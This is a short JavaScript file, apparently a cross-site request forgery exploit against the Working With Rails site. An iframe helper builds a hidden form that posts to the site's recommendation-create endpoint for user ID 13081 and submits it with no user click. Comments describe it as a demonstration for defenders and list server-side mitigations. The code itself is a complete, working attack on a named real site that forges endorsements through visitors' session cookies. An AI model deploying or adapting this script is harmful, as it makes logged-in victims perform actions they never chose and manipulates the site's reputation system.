// CSRF for Working With Rails

/**
 * Create an <iframe>, attach it to the page, and expose its document as
 * an extra `doc` property on the returned element.
 *
 * @param {Element|null|undefined} parentElement - element that will host the
 *        iframe; null or undefined means document.body.
 * @returns {HTMLIFrameElement} the attached iframe, with `iframe.doc` set to
 *          the iframe's document.
 * @throws {string} a plain string (not an Error object) when no document can
 *         be found on the iframe after it has been appended.
 */
function IFrame(parentElement)
{
   // Build the element first; its document is only reachable once attached.
   var frame = document.createElement("iframe");

   // A null or undefined parent means "attach to <body>".
   var host = (parentElement == null) ? document.body : parentElement;
   host.appendChild(frame);

   // Probe the three places a browser may expose the inner document, in the
   // same order as before: contentDocument, contentWindow.document, document.
   frame.doc = frame.contentDocument ? frame.contentDocument
             : frame.contentWindow   ? frame.contentWindow.document
             : frame.document        ? frame.document
             : null;

   // Loose comparison on purpose: an undefined document is rejected too.
   if (frame.doc == null) {
      throw "Document not found, append the parent element to the DOM before creating the IFrame";
   }

   // Open and immediately close the document stream. The code that uses this
   // helper reads doc.body afterwards, so presumably this is what makes the
   // empty document usable (confirm per browser).
   frame.doc.open();
   frame.doc.close();

   return frame;
}

// Cross-site request forgery demonstration: a page on another origin builds
// a form inside an iframe and submits it without any user interaction.
// The browser attaches the visitor's existing session cookie for the target
// site, so the request arrives looking like one the logged-in user made.
//
// What this shows for defenders: the form carries only the three
// recommendation[...] fields and no anti-forgery token, so it can only
// succeed if the endpoint accepts a state-changing POST on the strength of
// the cookie alone. Mitigations to check on the server side: Rails'
// protect_from_forgery (per-session authenticity token verified on every
// non-GET request), SameSite on the session cookie, and rejecting POSTs
// whose Origin/Referer is not the site's own.
var iframe = IFrame(document.body);
var doc = iframe.doc;

// The form lives in the iframe's document, so the submission navigates the
// iframe rather than the hosting page.
var form = doc.createElement('form');
form.setAttribute('action', 'http://workingwithrails.com/recommendation/create');
form.setAttribute('method', 'post');
doc.body.appendChild(form);

// Hidden fields in the nested-parameter naming Rails parses into
// params[:recommendation]. Values are the ones given on the page.
[
   ['recommendation[for_person_id]', '13081'],
   ['recommendation[have_read_blog]', '1'],
   ['recommendation[have_used_code_they_have_written]', '1']
].forEach(function (pair) {
   var hidden = doc.createElement('input');
   hidden.setAttribute('type', 'hidden');
   hidden.setAttribute('name', pair[0]);
   hidden.setAttribute('value', pair[1]);
   form.appendChild(hidden);
});

// Script-initiated submit: no click is needed, which is why a per-request
// token (something the foreign page cannot read) is the reliable defence.
form.submit();